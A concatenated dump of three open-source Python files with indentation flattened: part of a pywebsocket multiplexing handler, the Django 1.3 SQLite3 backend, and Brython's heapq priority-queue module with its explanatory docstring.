def _send_error_add_channel_response(self, channel_id, status=None):
if status is None:
status = common.HTTP_STATUS_BAD_REQUEST
if status in _HTTP_BAD_RESPONSE_MESSAGES:
message = _HTTP_BAD_RESPONSE_MESSAGES[status]
else:
self._logger.debug('Response message for %d is not found' % status)
message = '???'
response = 'HTTP/1.1 %d %s\r\n\r\n' % (status, message)
frame_data = _create_add_channel_response(channel_id,
encoded_handshake=response,
encoding=0, rejected=True)
self.send_control_data(frame_data)
def _create_logical_request(self, block):
if block.channel_id == _CONTROL_CHANNEL_ID:
# TODO(bashi): Raise PhysicalConnectionError with code 2006
# instead of MuxUnexpectedException.
raise MuxUnexpectedException(
'Received the control channel id (0) as objective channel '
'id for AddChannel')
if block.encoding > _HANDSHAKE_ENCODING_DELTA:
raise PhysicalConnectionError(
_DROP_CODE_UNKNOWN_REQUEST_ENCODING)
method, path, version, headers = _parse_request_text(
block.encoded_handshake)
if block.encoding == _HANDSHAKE_ENCODING_DELTA:
headers = self._handshake_base.create_headers(headers)
connection = _LogicalConnection(self, block.channel_id)
request = _LogicalRequest(block.channel_id, method, path, version,
headers, connection)
return request
def _do_handshake_for_logical_request(self, request, send_quota=0):
try:
receive_quota = self._channel_slots.popleft()
except IndexError:
raise LogicalChannelError(
request.channel_id, _DROP_CODE_NEW_CHANNEL_SLOT_VIOLATION)
handshaker = _MuxHandshaker(request, self.dispatcher,
send_quota, receive_quota)
try:
handshaker.do_handshake()
except handshake.VersionException, e:
self._logger.info('%s', e)
self._send_error_add_channel_response(
request.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
return False
except handshake.HandshakeException, e:
# TODO(bashi): Should we _Fail the Logical Channel_ with 3001
# instead?
self._logger.info('%s', e)
self._send_error_add_channel_response(request.channel_id,
status=e.status)
return False
except handshake.AbortedByUserException, e:
self._logger.info('%s', e)
self._send_error_add_channel_response(request.channel_id)
return False
return True
def _add_logical_channel(self, logical_request):
try:
self._logical_channels_condition.acquire()
if logical_request.channel_id in self._logical_channels:
self._logger.debug('Channel id %d already exists' %
logical_request.channel_id)
raise PhysicalConnectionError(
_DROP_CODE_CHANNEL_ALREADY_EXISTS,
'Channel id %d already exists' %
logical_request.channel_id)
worker = _Worker(self, logical_request)
channel_data = _LogicalChannelData(logical_request, worker)
self._logical_channels[logical_request.channel_id] = channel_data
worker.start()
finally:
self._logical_channels_condition.release()
def _process_add_channel_request(self, block):
try:
logical_request = self._create_logical_request(block)
except ValueError, e:
self._logger.debug('Failed to create logical request: %r' % e)
self._send_error_add_channel_response(
block.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
return
if self._do_handshake_for_logical_request(logical_request):
if block.encoding == _HANDSHAKE_ENCODING_IDENTITY:
# Update handshake base.
# TODO(bashi): Make sure this is the right place to update
# handshake base.
self._handshake_base = _HandshakeDeltaBase(
logical_request.headers_in)
self._add_logical_channel(logical_request)
else:
self._send_error_add_channel_response(
block.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
def _process_flow_control(self, block):
try:
self._logical_channels_condition.acquire()
if not block.channel_id in self._logical_channels:
return
channel_data = self._logical_channels[block.channel_id]
channel_data.request.ws_stream.replenish_send_quota(
block.send_quota)
finally:
self._logical_channels_condition.release()
def _process_drop_channel(self, block):
self._logger.debug(
'DropChannel received for %d: code=%r, reason=%r' %
(block.channel_id, block.drop_code, block.drop_message))
try:
self._logical_channels_condition.acquire()
if not block.channel_id in self._logical_channels:
return
channel_data = self._logical_channels[block.channel_id]
channel_data.drop_code = _DROP_CODE_ACKNOWLEDGED
# Close the logical channel
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
channel_data.request.ws_stream.stop_sending()
finally:
self._logical_channels_condition.release()
def _process_control_blocks(self, parser):
for control_block in parser.read_control_blocks():
opcode = control_block.opcode
self._logger.debug('control block received, opcode: %d' % opcode)
if opcode == _MUX_OPCODE_ADD_CHANNEL_REQUEST:
self._process_add_channel_request(control_block)
elif opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Received AddChannelResponse')
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
self._process_flow_control(control_block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
self._process_drop_channel(control_block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Received NewChannelSlot')
else:
raise MuxUnexpectedException(
'Unexpected opcode %r' % opcode)
def _process_logical_frame(self, channel_id, parser):
self._logger.debug('Received a frame. channel id=%d' % channel_id)
try:
self._logical_channels_condition.acquire()
if not channel_id in self._logical_channels:
# We must ignore the message for an inactive channel.
return
channel_data = self._logical_channels[channel_id]
fin, rsv1, rsv2, rsv3, opcode, payload = parser.read_inner_frame()
consuming_byte = len(payload)
if opcode != common.OPCODE_CONTINUATION:
consuming_byte += 1
if not channel_data.request.ws_stream.consume_receive_quota(
consuming_byte):
# The client violates quota. Close logical channel.
raise LogicalChannelError(
channel_id, _DROP_CODE_SEND_QUOTA_VIOLATION)
header = create_header(opcode, len(payload), fin, rsv1, rsv2, rsv3,
mask=False)
frame_data = header + payload
channel_data.request.connection.append_frame_data(frame_data)
finally:
self._logical_channels_condition.release()
def dispatch_message(self, message):
"""Dispatches message. The reader thread calls this method.
Args:
message: a message that contains encapsulated frame.
Raises:
PhysicalConnectionError: if the message contains physical
connection level errors.
LogicalChannelError: if the message contains logical channel
level errors.
"""
parser = _MuxFramePayloadParser(message)
try:
channel_id = parser.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_CHANNEL_ID_TRUNCATED)
if channel_id == _CONTROL_CHANNEL_ID:
self._process_control_blocks(parser)
else:
self._process_logical_frame(channel_id, parser)
def notify_worker_done(self, channel_id):
"""Called when a worker has finished.
Args:
channel_id: channel id corresponded with the worker.
"""
self._logger.debug('Worker for channel id %d terminated' % channel_id)
try:
self._logical_channels_condition.acquire()
if not channel_id in self._logical_channels:
raise MuxUnexpectedException(
'Channel id %d not found' % channel_id)
channel_data = self._logical_channels.pop(channel_id)
finally:
self._worker_done_notify_received = True
self._logical_channels_condition.notify()
self._logical_channels_condition.release()
if not channel_data.request.server_terminated:
self._send_drop_channel(
channel_id, code=channel_data.drop_code,
message=channel_data.drop_message)
def notify_reader_done(self):
"""This method is called by the reader thread when the reader has
finished.
"""
self._logger.debug(
'Termiating all logical connections waiting for incoming data '
'...')
self._logical_channels_condition.acquire()
for channel_data in self._logical_channels.values():
try:
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
except Exception:
self._logger.debug(traceback.format_exc())
self._logical_channels_condition.release()
def notify_writer_done(self):
"""This method is called by the writer thread when the writer has
finished.
"""
self._logger.debug(
'Termiating all logical connections waiting for write '
'completion ...')
self._logical_channels_condition.acquire()
for channel_data in self._logical_channels.values():
try:
channel_data.request.connection.on_writer_done()
except Exception:
self._logger.debug(traceback.format_exc())
self._logical_channels_condition.release()
def fail_physical_connection(self, code, message):
"""Fail the physical connection.
Args:
code: drop reason code.
message: drop message.
"""
self._logger.debug('Failing the physical connection...')
self._send_drop_channel(_CONTROL_CHANNEL_ID, code, message)
self._writer.stop(common.STATUS_INTERNAL_ENDPOINT_ERROR)
def fail_logical_channel(self, channel_id, code, message):
"""Fail a logical channel.
Args:
channel_id: channel id.
code: drop reason code.
message: drop message.
"""
self._logger.debug('Failing logical channel %d...' % channel_id)
try:
self._logical_channels_condition.acquire()
if channel_id in self._logical_channels:
channel_data = self._logical_channels[channel_id]
# Close the logical channel. notify_worker_done() will be
# called later and it will send DropChannel.
channel_data.drop_code = code
channel_data.drop_message = message
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
channel_data.request.ws_stream.stop_sending()
else:
self._send_drop_channel(channel_id, code, message)
finally:
self._logical_channels_condition.release()
def use_mux(request):
return hasattr(request, 'mux_processor') and (
request.mux_processor.is_active())
def start(request, dispatcher):
mux_handler = _MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(_INITIAL_NUMBER_OF_CHANNEL_SLOTS,
_INITIAL_QUOTA_FOR_CLIENT)
mux_handler.wait_until_done()
# vi:sts=4 sw=4 et
| mpl-2.0 |
dvliman/jaikuengine | .google_appengine/lib/django-1.3/django/db/backends/sqlite3/base.py | 32 | 12204 | """
SQLite3 backend for django.
Python 2.4 requires pysqlite2 (http://pysqlite.org/).
Python 2.5 and later can use a pysqlite2 module or the sqlite3 module in the
standard library.
"""
import re
import sys
import datetime
from django.db import utils
from django.db.backends import *
from django.db.backends.signals import connection_created
from django.db.backends.sqlite3.client import DatabaseClient
from django.db.backends.sqlite3.creation import DatabaseCreation
from django.db.backends.sqlite3.introspection import DatabaseIntrospection
from django.utils.safestring import SafeString
try:
try:
from pysqlite2 import dbapi2 as Database
except ImportError, e1:
from sqlite3 import dbapi2 as Database
except ImportError, exc:
import sys
from django.core.exceptions import ImproperlyConfigured
if sys.version_info < (2, 5, 0):
module = 'pysqlite2 module'
exc = e1
else:
module = 'either pysqlite2 or sqlite3 modules (tried in that order)'
raise ImproperlyConfigured("Error loading %s: %s" % (module, exc))
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
Database.register_converter("bool", lambda s: str(s) == '1')
Database.register_converter("time", util.typecast_time)
Database.register_converter("date", util.typecast_date)
Database.register_converter("datetime", util.typecast_timestamp)
Database.register_converter("timestamp", util.typecast_timestamp)
Database.register_converter("TIMESTAMP", util.typecast_timestamp)
Database.register_converter("decimal", util.typecast_decimal)
Database.register_adapter(decimal.Decimal, util.rev_typecast_decimal)
if Database.version_info >= (2,4,1):
# Starting in 2.4.1, the str type is not accepted anymore, therefore,
# we convert all str objects to Unicode
# As registering a adapter for a primitive type causes a small
# slow-down, this adapter is only registered for sqlite3 versions
# needing it.
Database.register_adapter(str, lambda s:s.decode('utf-8'))
Database.register_adapter(SafeString, lambda s:s.decode('utf-8'))
class DatabaseFeatures(BaseDatabaseFeatures):
# SQLite cannot handle us only partially reading from a cursor's result set
# and then writing the same rows to the database in another cursor. This
# setting ensures we always read result sets fully into memory all in one
# go.
can_use_chunked_reads = False
test_db_allows_multiple_connections = False
supports_unspecified_pk = True
supports_1000_query_parameters = False
supports_mixed_date_datetime_comparisons = False
def _supports_stddev(self):
"""Confirm support for STDDEV and related stats functions
SQLite supports STDDEV as an extension package; so
connection.ops.check_aggregate_support() can't unilaterally
rule out support for STDDEV. We need to manually check
whether the call works.
"""
cursor = self.connection.cursor()
cursor.execute('CREATE TABLE STDDEV_TEST (X INT)')
try:
cursor.execute('SELECT STDDEV(*) FROM STDDEV_TEST')
has_support = True
except utils.DatabaseError:
has_support = False
cursor.execute('DROP TABLE STDDEV_TEST')
return has_support
class DatabaseOperations(BaseDatabaseOperations):
def date_extract_sql(self, lookup_type, field_name):
# sqlite doesn't support extract, so we fake it with the user-defined
# function django_extract that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_extract('%s', %s)" % (lookup_type.lower(), field_name)
def date_interval_sql(self, sql, connector, timedelta):
# It would be more straightforward if we could use the sqlite strftime
# function, but it does not allow for keeping six digits of fractional
# second information, nor does it allow for formatting date and datetime
# values differently. So instead we register our own function that
# formats the datetime combined with the delta in a manner suitable
# for comparisons.
return u'django_format_dtdelta(%s, "%s", "%d", "%d", "%d")' % (sql,
connector, timedelta.days, timedelta.seconds, timedelta.microseconds)
def date_trunc_sql(self, lookup_type, field_name):
# sqlite doesn't support DATE_TRUNC, so we fake it with a user-defined
# function django_date_trunc that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_date_trunc('%s', %s)" % (lookup_type.lower(), field_name)
def drop_foreignkey_sql(self):
return ""
def pk_default_value(self):
return 'NULL'
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def no_limit_value(self):
return -1
def sql_flush(self, style, tables, sequences):
# NB: The generated SQL below is specific to SQLite
# Note: The DELETE FROM... SQL generated below works for SQLite databases
# because constraints don't exist
sql = ['%s %s %s;' % \
(style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# Note: No requirement for reset of auto-incremented indices (cf. other
# sql_flush() implementations). Just return SQL at this point
return sql
def year_lookup_bounds(self, value):
first = '%s-01-01'
second = '%s-12-31 23:59:59.999999'
return [first % value, second % value]
def convert_values(self, value, field):
"""SQLite returns floats when it should be returning decimals,
and gets dates and datetimes wrong.
For consistency with other backends, coerce when required.
"""
internal_type = field.get_internal_type()
if internal_type == 'DecimalField':
return util.typecast_decimal(field.format_number(value))
elif internal_type and internal_type.endswith('IntegerField') or internal_type == 'AutoField':
return int(value)
elif internal_type == 'DateField':
return util.typecast_date(value)
elif internal_type == 'DateTimeField':
return util.typecast_timestamp(value)
elif internal_type == 'TimeField':
return util.typecast_time(value)
# No field, or the field isn't known to be a decimal or integer
return value
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'sqlite'
# SQLite requires LIKE statements to include an ESCAPE clause if the value
# being escaped has a percent or underscore in it.
# See http://www.sqlite.org/lang_expr.html for an explanation.
operators = {
'exact': '= %s',
'iexact': "LIKE %s ESCAPE '\\'",
'contains': "LIKE %s ESCAPE '\\'",
'icontains': "LIKE %s ESCAPE '\\'",
'regex': 'REGEXP %s',
'iregex': "REGEXP '(?i)' || %s",
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': "LIKE %s ESCAPE '\\'",
'endswith': "LIKE %s ESCAPE '\\'",
'istartswith': "LIKE %s ESCAPE '\\'",
'iendswith': "LIKE %s ESCAPE '\\'",
}
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations()
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def _cursor(self):
if self.connection is None:
settings_dict = self.settings_dict
if not settings_dict['NAME']:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Please fill out the database NAME in the settings module before using the database.")
kwargs = {
'database': settings_dict['NAME'],
'detect_types': Database.PARSE_DECLTYPES | Database.PARSE_COLNAMES,
}
kwargs.update(settings_dict['OPTIONS'])
self.connection = Database.connect(**kwargs)
# Register extract, date_trunc, and regexp functions.
self.connection.create_function("django_extract", 2, _sqlite_extract)
self.connection.create_function("django_date_trunc", 2, _sqlite_date_trunc)
self.connection.create_function("regexp", 2, _sqlite_regexp)
self.connection.create_function("django_format_dtdelta", 5, _sqlite_format_dtdelta)
connection_created.send(sender=self.__class__, connection=self)
return self.connection.cursor(factory=SQLiteCursorWrapper)
def close(self):
# If database is in memory, closing the connection destroys the
# database. To prevent accidental data loss, ignore close requests on
# an in-memory db.
if self.settings_dict['NAME'] != ":memory:":
BaseDatabaseWrapper.close(self)
FORMAT_QMARK_REGEX = re.compile(r'(?<!%)%s')
class SQLiteCursorWrapper(Database.Cursor):
"""
Django uses "format" style placeholders, but pysqlite2 uses "qmark" style.
This fixes it -- but note that if you want to use a literal "%s" in a query,
you'll need to use "%%s".
"""
def execute(self, query, params=()):
query = self.convert_query(query)
try:
return Database.Cursor.execute(self, query, params)
except Database.IntegrityError, e:
raise utils.IntegrityError, utils.IntegrityError(*tuple(e)), sys.exc_info()[2]
except Database.DatabaseError, e:
raise utils.DatabaseError, utils.DatabaseError(*tuple(e)), sys.exc_info()[2]
def executemany(self, query, param_list):
query = self.convert_query(query)
try:
return Database.Cursor.executemany(self, query, param_list)
except Database.IntegrityError, e:
raise utils.IntegrityError, utils.IntegrityError(*tuple(e)), sys.exc_info()[2]
except Database.DatabaseError, e:
raise utils.DatabaseError, utils.DatabaseError(*tuple(e)), sys.exc_info()[2]
def convert_query(self, query):
return FORMAT_QMARK_REGEX.sub('?', query).replace('%%','%')
def _sqlite_extract(lookup_type, dt):
if dt is None:
return None
try:
dt = util.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if lookup_type == 'week_day':
return (dt.isoweekday() % 7) + 1
else:
return getattr(dt, lookup_type)
def _sqlite_date_trunc(lookup_type, dt):
try:
dt = util.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if lookup_type == 'year':
return "%i-01-01 00:00:00" % dt.year
elif lookup_type == 'month':
return "%i-%02i-01 00:00:00" % (dt.year, dt.month)
elif lookup_type == 'day':
return "%i-%02i-%02i 00:00:00" % (dt.year, dt.month, dt.day)
def _sqlite_format_dtdelta(dt, conn, days, secs, usecs):
try:
dt = util.typecast_timestamp(dt)
delta = datetime.timedelta(int(days), int(secs), int(usecs))
if conn.strip() == '+':
dt = dt + delta
else:
dt = dt - delta
except (ValueError, TypeError):
return None
if isinstance(dt, datetime.datetime):
rv = dt.strftime("%Y-%m-%d %H:%M:%S")
if dt.microsecond:
rv = "%s.%0.6d" % (rv, dt.microsecond)
else:
rv = dt.strftime("%Y-%m-%d")
return rv
def _sqlite_regexp(re_pattern, re_string):
import re
try:
return bool(re.search(re_pattern, re_string))
except:
return False
| apache-2.0 |
40223139/203739test | static/Brython3.1.0-20150301-090019/Lib/heapq.py | 628 | 18065 | """Heap queue algorithm (a.k.a. priority queue).
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
Usage:
heap = [] # creates an empty heap
heappush(heap, item) # pushes a new item on the heap
item = heappop(heap) # pops the smallest item from the heap
item = heap[0] # smallest item on the heap without popping it
heapify(x) # transforms list into a heap, in-place, in linear time
item = heapreplace(heap, item) # pops and returns smallest item, and adds
# new item; the heap size is unchanged
Our API differs from textbook heap algorithms as follows:
- We use 0-based indexing. This makes the relationship between the
index for a node and the indexes for its children slightly less
obvious, but is more suitable since Python uses 0-based indexing.
- Our heappop() method returns the smallest item, not the largest.
These two make it possible to view the heap as a regular Python list
without surprises: heap[0] is the smallest item, and heap.sort()
maintains the heap invariant!
"""
# Original code by Kevin O'Connor, augmented by Tim Peters and Raymond Hettinger
__about__ = """Heap queues
[explanation by François Pinard]
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
The strange invariant above is meant to be an efficient memory
representation for a tournament. The numbers below are `k', not a[k]:
0
1 2
3 4 5 6
7 8 9 10 11 12 13 14
15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
In the tree above, each cell `k' is topping `2*k+1' and `2*k+2'. In
an usual binary tournament we see in sports, each cell is the winner
over the two cells it tops, and we can trace the winner down the tree
to see all opponents s/he had. However, in many computer applications
of such tournaments, we do not need to trace the history of a winner.
To be more memory efficient, when a winner is promoted, we try to
replace it by something else at a lower level, and the rule becomes
that a cell and the two cells it tops contain three different items,
but the top cell "wins" over the two topped cells.
If this heap invariant is protected at all time, index 0 is clearly
the overall winner. The simplest algorithmic way to remove it and
find the "next" winner is to move some loser (let's say cell 30 in the
diagram above) into the 0 position, and then percolate this new 0 down
the tree, exchanging values, until the invariant is re-established.
This is clearly logarithmic on the total number of items in the tree.
By iterating over all items, you get an O(n ln n) sort.
A nice feature of this sort is that you can efficiently insert new
items while the sort is going on, provided that the inserted items are
not "better" than the last 0'th element you extracted. This is
especially useful in simulation contexts, where the tree holds all
incoming events, and the "win" condition means the smallest scheduled
time. When an event schedule other events for execution, they are
scheduled into the future, so they can easily go into the heap. So, a
heap is a good structure for implementing schedulers (this is what I
used for my MIDI sequencer :-).
Various structures for implementing schedulers have been extensively
studied, and heaps are good for this, as they are reasonably speedy,
the speed is almost constant, and the worst case is not much different
than the average case. However, there are other representations which
are more efficient overall, yet the worst cases might be terrible.
Heaps are also very useful in big disk sorts. You most probably all
know that a big sort implies producing "runs" (which are pre-sorted
sequences, which size is usually related to the amount of CPU memory),
followed by a merging passes for these runs, which merging is often
very cleverly organised[1]. It is very important that the initial
sort produces the longest runs possible. Tournaments are a good way
to that. If, using all the memory available to hold a tournament, you
replace and percolate items that happen to fit the current run, you'll
produce runs which are twice the size of the memory for random input,
and much better for input fuzzily ordered.
Moreover, if you output the 0'th item on disk and get an input which
may not fit in the current tournament (because the value "wins" over
the last output value), it cannot fit in the heap, so the size of the
heap decreases. The freed memory could be cleverly reused immediately
for progressively building a second heap, which grows at exactly the
same rate the first heap is melting. When the first heap completely
vanishes, you switch heaps and start a new run. Clever and quite
effective!
In a word, heaps are useful memory structures to know. I use them in
a few applications, and I think it is good to keep a `heap' module
around. :-)
--------------------
[1] The disk balancing algorithms which are current, nowadays, are
more annoying than clever, and this is a consequence of the seeking
capabilities of the disks. On devices which cannot seek, like big
tape drives, the story was quite different, and one had to be very
clever to ensure (far in advance) that each tape movement will be the
most effective possible (that is, will best participate at
"progressing" the merge). Some tapes were even able to read
backwards, and this was also used to avoid the rewinding time.
Believe me, real good tape sorts were quite spectacular to watch!
From all times, sorting has always been a Great Art! :-)
"""
__all__ = ['heappush', 'heappop', 'heapify', 'heapreplace', 'merge',
'nlargest', 'nsmallest', 'heappushpop']
from itertools import islice, count, tee, chain
def heappush(heap, item):
"""Push item onto heap, maintaining the heap invariant."""
heap.append(item)
_siftdown(heap, 0, len(heap)-1)
def heappop(heap):
"""Pop the smallest item off the heap, maintaining the heap invariant."""
lastelt = heap.pop() # raises appropriate IndexError if heap is empty
if heap:
returnitem = heap[0]
heap[0] = lastelt
_siftup(heap, 0)
else:
returnitem = lastelt
return returnitem
def heapreplace(heap, item):
"""Pop and return the current smallest value, and add the new item.
This is more efficient than heappop() followed by heappush(), and can be
more appropriate when using a fixed-size heap. Note that the value
returned may be larger than item! That constrains reasonable uses of
this routine unless written as part of a conditional replacement:
if item > heap[0]:
item = heapreplace(heap, item)
"""
returnitem = heap[0] # raises appropriate IndexError if heap is empty
heap[0] = item
_siftup(heap, 0)
return returnitem
def heappushpop(heap, item):
"""Fast version of a heappush followed by a heappop."""
if heap and heap[0] < item:
item, heap[0] = heap[0], item
_siftup(heap, 0)
return item
def heapify(x):
"""Transform list into a heap, in-place, in O(len(x)) time."""
n = len(x)
# Transform bottom-up. The largest index there's any point to looking at
# is the largest with a child index in-range, so must have 2*i + 1 < n,
# or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so
# j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is
# (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1.
for i in reversed(range(n//2)):
_siftup(x, i)
def _heappushpop_max(heap, item):
"""Maxheap version of a heappush followed by a heappop."""
if heap and item < heap[0]:
item, heap[0] = heap[0], item
_siftup_max(heap, 0)
return item
def _heapify_max(x):
"""Transform list into a maxheap, in-place, in O(len(x)) time."""
n = len(x)
for i in reversed(range(n//2)):
_siftup_max(x, i)
def nlargest(n, iterable):
"""Find the n largest elements in a dataset.
Equivalent to: sorted(iterable, reverse=True)[:n]
"""
if n < 0:
return []
it = iter(iterable)
result = list(islice(it, n))
if not result:
return result
heapify(result)
_heappushpop = heappushpop
for elem in it:
_heappushpop(result, elem)
result.sort(reverse=True)
return result
def nsmallest(n, iterable):
"""Find the n smallest elements in a dataset.
Equivalent to: sorted(iterable)[:n]
"""
if n < 0:
return []
it = iter(iterable)
result = list(islice(it, n))
if not result:
return result
_heapify_max(result)
_heappushpop = _heappushpop_max
for elem in it:
_heappushpop(result, elem)
result.sort()
return result
# 'heap' is a heap at all indices >= startpos, except possibly for pos. pos
# is the index of a leaf with a possibly out-of-order value. Restore the
# heap invariant.
def _siftdown(heap, startpos, pos):
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if newitem < parent:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
# The child indices of heap index pos are already heaps, and we want to make
# a heap at index pos too. We do this by bubbling the smaller child of
# pos up (and so on with that child's children, etc) until hitting a leaf,
# then using _siftdown to move the oddball originally at index pos into place.
#
# We *could* break out of the loop as soon as we find a pos where newitem <=
# both its children, but turns out that's not a good idea, and despite that
# many books write the algorithm that way. During a heap pop, the last array
# element is sifted in, and that tends to be large, so that comparing it
# against values starting from the root usually doesn't pay (= usually doesn't
# get us out of the loop early). See Knuth, Volume 3, where this is
# explained and quantified in an exercise.
#
# Cutting the # of comparisons is important, since these routines have no
# way to extract "the priority" from an array element, so that intelligence
# is likely to be hiding in custom comparison methods, or in array elements
# storing (priority, record) tuples. Comparisons are thus potentially
# expensive.
#
# On random arrays of length 1000, making this change cut the number of
# comparisons made by heapify() a little, and those made by exhaustive
# heappop() a lot, in accord with theory. Here are typical results from 3
# runs (3 just to demonstrate how small the variance is):
#
# Compares needed by heapify Compares needed by 1000 heappops
# -------------------------- --------------------------------
# 1837 cut to 1663 14996 cut to 8680
# 1855 cut to 1659 14966 cut to 8678
# 1847 cut to 1660 15024 cut to 8703
#
# Building the heap by using heappush() 1000 times instead required
# 2198, 2148, and 2219 compares: heapify() is more efficient, when
# you can use it.
#
# The total compares needed by list.sort() on the same lists were 8627,
# 8627, and 8632 (this should be compared to the sum of heapify() and
# heappop() compares): list.sort() is (unsurprisingly!) more efficient
# for sorting.
def _siftup(heap, pos):
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the smaller child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of smaller child.
rightpos = childpos + 1
if rightpos < endpos and not heap[childpos] < heap[rightpos]:
childpos = rightpos
# Move the smaller child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown(heap, startpos, pos)
def _siftdown_max(heap, startpos, pos):
'Maxheap variant of _siftdown'
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if parent < newitem:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
def _siftup_max(heap, pos):
'Maxheap variant of _siftup'
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the larger child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of larger child.
rightpos = childpos + 1
if rightpos < endpos and not heap[rightpos] < heap[childpos]:
childpos = rightpos
# Move the larger child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown_max(heap, startpos, pos)
# If available, use C implementation
#_heapq does not exist in brython, so lets just comment it out.
#try:
# from _heapq import *
#except ImportError:
# pass
def merge(*iterables):
'''Merge multiple sorted inputs into a single sorted output.
Similar to sorted(itertools.chain(*iterables)) but returns a generator,
does not pull the data into memory all at once, and assumes that each of
the input streams is already sorted (smallest to largest).
>>> list(merge([1,3,5,7], [0,2,4,8], [5,10,15,20], [], [25]))
[0, 1, 2, 3, 4, 5, 5, 7, 8, 10, 15, 20, 25]
'''
_heappop, _heapreplace, _StopIteration = heappop, heapreplace, StopIteration
_len = len
h = []
h_append = h.append
for itnum, it in enumerate(map(iter, iterables)):
try:
next = it.__next__
h_append([next(), itnum, next])
except _StopIteration:
pass
heapify(h)
while _len(h) > 1:
try:
while True:
v, itnum, next = s = h[0]
yield v
s[0] = next() # raises StopIteration when exhausted
_heapreplace(h, s) # restore heap condition
except _StopIteration:
_heappop(h) # remove empty iterator
if h:
# fast case when only a single iterator remains
v, itnum, next = h[0]
yield v
yield from next.__self__
# Extend the implementations of nsmallest and nlargest to use a key= argument
_nsmallest = nsmallest
def nsmallest(n, iterable, key=None):
"""Find the n smallest elements in a dataset.
Equivalent to: sorted(iterable, key=key)[:n]
"""
# Short-cut for n==1 is to use min() when len(iterable)>0
if n == 1:
it = iter(iterable)
head = list(islice(it, 1))
if not head:
return []
if key is None:
return [min(chain(head, it))]
return [min(chain(head, it), key=key)]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key)[:n]
# When key is none, use simpler decoration
if key is None:
it = zip(iterable, count()) # decorate
result = _nsmallest(n, it)
return [r[0] for r in result] # undecorate
# General case, slowest method
in1, in2 = tee(iterable)
it = zip(map(key, in1), count(), in2) # decorate
result = _nsmallest(n, it)
return [r[2] for r in result] # undecorate
_nlargest = nlargest
def nlargest(n, iterable, key=None):
"""Find the n largest elements in a dataset.
Equivalent to: sorted(iterable, key=key, reverse=True)[:n]
"""
# Short-cut for n==1 is to use max() when len(iterable)>0
if n == 1:
it = iter(iterable)
head = list(islice(it, 1))
if not head:
return []
if key is None:
return [max(chain(head, it))]
return [max(chain(head, it), key=key)]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key, reverse=True)[:n]
# When key is none, use simpler decoration
if key is None:
it = zip(iterable, count(0,-1)) # decorate
result = _nlargest(n, it)
return [r[0] for r in result] # undecorate
# General case, slowest method
in1, in2 = tee(iterable)
it = zip(map(key, in1), count(0,-1), in2) # decorate
result = _nlargest(n, it)
return [r[2] for r in result] # undecorate
if __name__ == "__main__":
# Simple sanity test
heap = []
